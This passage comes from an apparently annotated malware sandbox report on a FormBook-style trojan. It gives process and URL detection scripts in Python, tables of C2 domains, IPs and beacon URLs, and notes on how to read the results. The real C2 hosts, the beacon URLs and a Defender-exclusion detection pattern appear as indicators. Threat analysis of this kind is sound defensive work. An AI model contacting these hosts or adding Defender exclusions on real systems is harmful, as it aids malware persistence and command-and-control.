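# The desktop shell does talk to the network, so a connection from it is only a
# weak signal on its own (the report still raises it for explorer.exe).
SYSTEM_SHELL_IMAGES = {"explorer.exe"}
# Add-MpPreference with any -Exclusion* parameter weakens Defender coverage.
DEFENDER_EXCLUSION = re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Process|Extension)", re.I)


def detect(process_events, network_events):
    """Return (rule, pid, image, detail) tuples in input order."""
    by_pid = {e["pid"]: e for e in process_events}
    findings = []
    for e in process_events:
        parent = by_pid.get(e["ppid"])
        image = e["image"].lower()
        # Rule 1: parent and child share an image name, the shape left by
        # "start a copy of myself and hollow it".
        if parent and parent["image"].lower() == image:
            findings.append(("self_spawn_hollowing_candidate", e["pid"], e["image"],
                             f"parent pid {parent['pid']}"))
        # Rule 2: Defender exclusion added from a PowerShell command line.
        if image == "powershell.exe" and DEFENDER_EXCLUSION.search(e.get("cmdline", "")):
            findings.append(("defender_exclusion_added", e["pid"], e["image"], e["cmdline"]))
        # Rule 3: the shell directly starting a console network utility.
        if parent and parent["image"].lower() == "explorer.exe" and image == "ipconfig.exe":
            findings.append(("explorer_spawns_ipconfig", e["pid"], e["image"],
                             f"parent pid {parent['pid']}"))
    for n in network_events:
        proc = by_pid.get(n["pid"])
        if proc is None:
            continue
        image = proc["image"].lower()
        dst = f"{n['dst_ip']}:{n['dst_port']}"
        # Rule 4: a process that should never talk to the network does.
        if image in NO_NETWORK_IMAGES:
            findings.append(("injected_process_network", n["pid"], proc["image"], dst))
        # Rule 5: the shell itself beacons out (weak on its own, strong next to rule 4).
        elif image in SYSTEM_SHELL_IMAGES:
            findings.append(("system_process_network", n["pid"], proc["image"], dst))
    return findings


def summarize(findings):
    """Count findings per rule."""
    return dict(Counter(rule for rule, *_ in findings))


def flagged_pids(findings):
    """Sorted, de-duplicated PIDs that triggered at least one rule."""
    return sorted({pid for _, pid, *_ in findings})


if __name__ == "__main__":
    for finding in detect(PROCESS_EVENTS, NETWORK_EVENTS):
        print(" | ".join(str(x) for x in finding))
```

Run stand-alone the script prints six findings; chrome.exe (pid 300) triggers nothing because a user-launched browser connecting on 443 is the normal case the rules are written to ignore.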


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
HAWB AND INV.exe | 21% | ReversingLabs | Win32.Trojan.AgentTesla

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe | 21% | ReversingLabs | Win32.Trojan.AgentTesla

Unpacked PE Files

Source | Detection | Scanner | Label
10.2.HAWB AND INV.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

Source | Detection | Scanner
www.premier-moment.info | 0% | Virustotal
ecosanhn.com | 0% | Virustotal
jaimericart.com | 0% | Virustotal
networkingmaderas.com | 0% | Virustotal

          URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://go.microX% | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.premier-moment.info/maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4 | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
www.alldaazz.com/maw9/ | 0% | Avira URL Cloud | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.networkingmaderas.com/maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx4 | 0% | Avira URL Cloud | safe
http://www.dinkoistmatrimony.com/maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx4 | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.ecosanhn.com/maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx4 | 0% | Avira URL Cloud | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.curvygirlholiday.com/maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx4 | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Reputation
www.premier-moment.info | 202.254.234.152 | true | true | unknown
ecosanhn.com | 181.214.142.2 | true | true | unknown
jaimericart.com | 81.88.48.71 | true | true | unknown
networkingmaderas.com | 107.180.57.119 | true | true | unknown
www.itechfreak.com | 192.238.144.41 | true | false | unknown
dinkoistmatrimony.com | 34.102.136.180 | true | false | unknown
curvygirlholiday.com | 34.102.136.180 | true | false | unknown
www.vipbrandwatch.info | unknown | unknown | true | unknown
www.networkingmaderas.com | unknown | unknown | true | unknown
www.beachrockisland.com | unknown | unknown | true | unknown
www.curvygirlholiday.com | unknown | unknown | true | unknown
www.dinkoistmatrimony.com | unknown | unknown | true | unknown
www.ecosanhn.com | unknown | unknown | true | unknown
www.jaimericart.com | unknown | unknown | true | unknown

No antivirus detection was reported for any of these domains.

                              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.premier-moment.info/maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4 | true | Avira URL Cloud: safe | unknown
www.alldaazz.com/maw9/ | true | Avira URL Cloud: safe | low
http://www.networkingmaderas.com/maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx4 | true | Avira URL Cloud: safe | unknown
http://www.dinkoistmatrimony.com/maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx4 | false | Avira URL Cloud: safe | unknown
http://www.ecosanhn.com/maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx4 | true | Avira URL Cloud: safe | unknown
http://www.curvygirlholiday.com/maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx4 | false | Avira URL Cloud: safe | unknown

All six contacted URLs share the same /maw9/ directory and the same two-parameter query (a long base64 value and the constant token sHbLpdw8x0Nx4), and every one of them, including the four the sandbox marks malicious, is rated "safe" by Avira URL Cloud. The reputation columns record what the vendor knew at scan time, not whether the URL is C2, and should not be used to down-rank the sandbox verdict.

                              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 0000000B.00000002.594031738.000000000095C000.00000004.00000020.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp; powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp; powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designers? | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | | high
https://go.micro | powershell.exe, 00000004.00000003.477109333.0000000005AE1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://go.microX% | powershell.exe, 00000002.00000003.453197763.0000000005250000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.tiro.com | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.kr | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://go.cpanel.net/privacy | ipconfig.exe, 00000017.00000002.598011304.0000000003162000.00000004.00000001.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp; powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmp | false | | high
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp | false | | high
http://www.carterandcone.coml | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer | ipconfig.exe, 00000017.00000002.598011304.0000000003162000.00000004.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.fonts.com | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp; powershell.exe, 00000002.00000002.527445795.00000000048A1000.00000004.00000001.sdmp | false | | high
https://github.com/unguest | HAWB AND INV.exe | false | | high
https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty | HAWB AND INV.exe | false | | high

Almost all of these strings are memory noise unrelated to the sample: the font-vendor URLs come from font metadata resident in explorer.exe, and the Pester and Apache license URLs from PowerShell module metadata. Two are worth a second look. The cpanel.com and go.cpanel.net strings sit in the memory of the injected ipconfig.exe (process 0x17), which is the process that carried the C2 traffic; strings of that kind are what a cPanel-hosted default error page contains, so at least one contacted host most likely answered with a hosting-provider 404 rather than a live panel during this run. The github.com/unguest strings sit in the original sample and point at the .NET loader it was built with.
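The Contacted URLs above all share one shape, a single short directory (/maw9/) followed by a query with one long base64 value and one short constant token, while the strings recovered from explorer.exe and powershell.exe memory are font-vendor and license URLs with no relation to the sample. The Python below is an added example, not code from the report or from Joe Sandbox: it separates the two sets on that shape, learns the directory token from the fully formed beacons so that a path-only entry such as www.alldaazz.com/maw9/ is still attributed, and emits the hosts and tokens as IOCs. The URL list is constructed from this page; the www.pantan-kobo.com entry from the Joe Sandbox View section, which uses a different directory (/ol/) and a different parameter pair, is included to show that the token changes between campaigns while the shape does not. The 40-character base64 threshold, the two-parameter rule and the token length bounds are this example's own heuristics, not a documented FormBook specification.

```python
"""Separate FormBook-style beacon URLs from memory-string noise and emit IOCs.

Added example, not from the Joe Sandbox report. The thresholds are this
example's heuristics, derived from the URLs on the page, not a documented
specification of the malware family.
"""
import base64
import re
from urllib.parse import urlsplit

# Constructed input: the six contacted URLs and the related-sample URL from the
# report, mixed with four of the benign strings the sandbox pulled from memory.
SAMPLE_URLS = [
    "http://www.premier-moment.info/maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4",
    "www.alldaazz.com/maw9/",
    "http://www.networkingmaderas.com/maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx4",
    "http://www.dinkoistmatrimony.com/maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx4",
    "http://www.ecosanhn.com/maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx4",
    "http://www.curvygirlholiday.com/maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx4",
    "www.pantan-kobo.com/ol/?id=9T9Ti/oEbGV5XKb/DiI7+YlY2YrLu7Qh2NTby3V925jAJz0JnotPS3vF81WrTrt3b5ypKJfWDP5iksTuKzm8UQ==&tv=u4NhtX-XqfSpdX",
    "http://www.fontbureau.com/designers/",
    "http://www.apache.org/licenses/LICENSE-2.0.html",
    "https://go.micro",
    "http://www.founder.com.cn/cn/bThe",
]

# Heuristic shapes (assumptions of this example).
B64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")     # long encoded payload
SHORT_RE = re.compile(r"^[A-Za-z0-9_-]{4,24}$")         # short constant token
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{2,8}$")            # single directory name


def split_query(query):
    """Split the query by hand: parse_qsl would turn '+' into a space and
    corrupt the base64 value."""
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def parse(url):
    """Return (host, path segments, query pairs, path ends with '/')."""
    if "://" not in url:
        url = "http://" + url          # sandbox lists some URLs without a scheme
    parts = urlsplit(url)
    segments = [p for p in parts.path.split("/") if p]
    return parts.hostname, segments, split_query(parts.query), parts.path.endswith("/")


def decodes(value):
    """True if value is strict base64 (alphabet and padding both valid)."""
    try:
        base64.b64decode(value, validate=True)
        return True
    except ValueError:
        return False


def is_beacon_shape(url):
    """/<token>/?<k1>=<long base64>&<k2>=<short id>, exactly two parameters."""
    host, segments, params, trailing_slash = parse(url)
    if not host or len(segments) != 1 or not trailing_slash or not TOKEN_RE.match(segments[0]):
        return False
    if len(params) != 2:
        return False
    long_values = [v for _, v in params if B64_RE.match(v) and decodes(v)]
    short_values = [v for _, v in params if SHORT_RE.match(v)]
    return len(long_values) == 1 and len(short_values) == 1


def learn_tokens(urls):
    """Directory tokens seen in fully formed beacons; used to attribute
    path-only sightings of the same C2 directory."""
    return {parse(u)[1][0] for u in urls if is_beacon_shape(u)}


def classify(urls):
    """Map each URL to 'c2_beacon', 'c2_path_pivot' or 'noise'."""
    tokens = learn_tokens(urls)
    result = {}
    for url in urls:
        _, segments, _, trailing_slash = parse(url)
        if is_beacon_shape(url):
            result[url] = "c2_beacon"
        elif len(segments) == 1 and trailing_slash and segments[0] in tokens:
            result[url] = "c2_path_pivot"
        else:
            result[url] = "noise"
    return result


def iocs(urls):
    """Hosts and directory tokens worth blocking or hunting for."""
    classes = classify(urls)
    hosts = sorted({parse(u)[0] for u, c in classes.items() if c != "noise"})
    return {"hosts": hosts, "path_tokens": sorted(learn_tokens(urls))}


if __name__ == "__main__":
    for url, label in classify(SAMPLE_URLS).items():
        print(f"{label:14} {url}")
    print(iocs(SAMPLE_URLS))
```

The directory token is the right pivot for hunting in proxy logs because the hostnames rotate (the report alone lists eight candidate domains, several not resolved at analysis time) while every beacon in one campaign reuses the same token; the learned-token step is what lets the scheme-less, query-less alldaazz.com sighting be attributed without a hard-coded list.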

                                                                    Contacted IPs


                                                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
181.214.142.2 | ecosanhn.com | Chile | 61317 | ASDETUKhttpwwwheficedcomGB | true
34.102.136.180 | dinkoistmatrimony.com | United States | 15169 | GOOGLEUS | false
107.180.57.119 | networkingmaderas.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
202.254.234.152 | www.premier-moment.info | Japan | 9371 | SAKURA-CSAKURAInternetIncJP | true

34.102.136.180 also resolved curvygirlholiday.com during the run (see Contacted Domains), so that address hosts two of the candidate C2 domains.

                                                                    General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 402848
Start date: 03.05.2021
Start time: 14:51:24
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 35s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: HAWB AND INV.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@16/19@9/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 8.2% (good quality ratio 7.3%)
• Quality average: 72%
• Quality standard deviation: 32%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded IPs from analysis (whitelisted): 13.88.21.125, 8.241.89.254, 8.238.29.254, 8.241.78.126, 8.238.29.126, 8.241.82.254, 40.88.32.150, 104.43.193.48, 13.64.90.137, 104.42.151.234, 20.50.102.62, 92.122.213.247, 92.122.213.249, 51.103.5.186, 52.155.217.156, 20.54.26.129, 40.64.100.89, 23.57.80.111
• Excluded domains from analysis (whitelisted): mw1eap.displaycatalog.md.mp.microsoft.com.akadns.net, fg.download.windowsupdate.com.c.footprint.net, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, consumerrp-displaycatalog-aks2eap-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, download.windowsupdate.com, displaycatalog-uswesteap.md.mp.microsoft.com.akadns.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

The report is a "light" run that stopped on timeout with EGA failed and the size limits hit for several native call families, so the behaviour recorded here is a lower bound: absence of an API call or signature in this report is not evidence that the sample does not perform it.

                                                                    Simulations

                                                                    Behavior and APIs

Time       Type              Description
14:52:21   API Interceptor   1x Sleep call for process: HAWB AND INV.exe modified
14:53:05   API Interceptor   123x Sleep call for process: powershell.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

Match             Associated Sample Name / URL   Detection   Context
202.254.234.152   21AZZWCT.exe                   malicious   www.pantan-kobo.com/ol/?id=9T9Ti/oEbGV5XKb/DiI7+YlY2YrLu7Qh2NTby3V925jAJz0JnotPS3vF81WrTrt3b5ypKJfWDP5iksTuKzm8UQ==&tv=u4NhtX-XqfSpdX

                                                                    Domains

                                                                    No context

                                                                    ASN

Match: AS-26496-GO-DADDY-COM-LLC (US)

Associated Sample Name / URL                     Detection   Context (contacted IP)
Inquiry 05042021.doc                             malicious   107.180.43.16
don.exe                                          malicious   184.168.131.241
Comand#U0103 de achizi#U021bie PP050321.exe      malicious   184.168.131.241
O1E623TjjW.exe                                   malicious   184.168.131.241
product specification.xlsx                       malicious   184.168.131.241
9DWvynenEDJ11fY.exe                              malicious   184.168.131.241
PURCHASE ORDER.exe                               malicious   184.168.131.241
ETC-B72-LT-0149-03-AR.exe                        malicious   184.168.131.241
SecuriteInfo.com.Heur.3869.xls                   malicious   192.186.217.35
SecuriteInfo.com.Heur.3869.xls                   malicious   192.186.217.35
SecuriteInfo.com.Heur.12433.xls                  malicious   192.186.217.35
SecuriteInfo.com.Heur.12433.xls                  malicious   192.186.217.35
Documents_1906038956_974385067.xls               malicious   192.186.217.35
Documents_1906038956_974385067.xls               malicious   192.186.217.35
Bill Of Lading & Packing List.pdf.gz.exe         malicious   107.180.44.132
SecuriteInfo.com.Heur.3421.xls                   malicious   192.186.217.35
SecuriteInfo.com.Heur.3421.xls                   malicious   192.186.217.35
Xerox Scan_07122020181109.exe                    malicious   50.62.160.30
94a5cd81_by_Libranalysis.xls                     malicious   192.186.217.35
Documents_585904356_2104184844.xls               malicious   192.186.217.35
ASDETUKhttpwwwheficedcomGBb8768PLUW1.exe         malicious   45.150.67.141
z3hir.x86                                        malicious   45.10.156.162
BVN1eAAgfj.exe                                   malicious   45.150.67.203
Document_1097567093_03242021_Copy.xlsm           malicious   45.150.67.23
Document_1097567093_03242021_Copy.xlsm           malicious   45.150.67.23
efaxCanberraearlylearning_633.htm                malicious   191.101.50.240
7728839942-04012021.xlsm                         malicious   45.150.67.244
7728839942-04012021.xlsm                         malicious   45.150.67.244
7728839942-04012021.xlsm                         malicious   45.150.67.244
9642351931-04012021.xlsm                         malicious   45.150.67.243
91844756223-04012021.xlsm                        malicious   45.150.67.243
9497306271-04012021.xlsm                         malicious   45.150.67.243
7122681326-04012021.xlsm                         malicious   45.150.67.244
9497306271-04012021.xlsm                         malicious   45.150.67.243
9497306271-04012021.xlsm                         malicious   45.150.67.243
91237434194-04012021.xlsm                        malicious   45.150.67.243
71559035622-04012021.xlsm                        malicious   45.150.67.244
91237434194-04012021.xlsm                        malicious   45.150.67.243
91237434194-04012021.xlsm                        malicious   45.150.67.243
91408811036-04012021.xlsm                        malicious   45.150.67.243

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HAWB AND INV.exe.log
                                                                    Process:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):1406
                                                                    Entropy (8bit):5.341099307467139
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmER:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHg
                                                                    MD5:E5FA1A53BA6D70E18192AF6AF7CFDBFA
                                                                    SHA1:1C076481F11366751B8DA795C98A54DE8D1D82D5
                                                                    SHA-256:1D7BAA6D3EB5A504FD4652BC01A0864DEE898D35D9E29D03EB4A60B0D6405D83
                                                                    SHA-512:77850814E24DB48E3DDF9DF5B6A8110EE1A823BAABA800F89CD353EAC7F72E48B13F3F4A4DC8E5F0FAA707A7F14ED90577CF1CB106A0422F0BEDD1EFD2E940E4
                                                                    Malicious:true
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):14734
                                                                    Entropy (8bit):4.993014478972177
                                                                    Encrypted:false
                                                                    SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                    MD5:8D5E194411E038C060288366D6766D3D
                                                                    SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                    SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                    SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                    Malicious:false
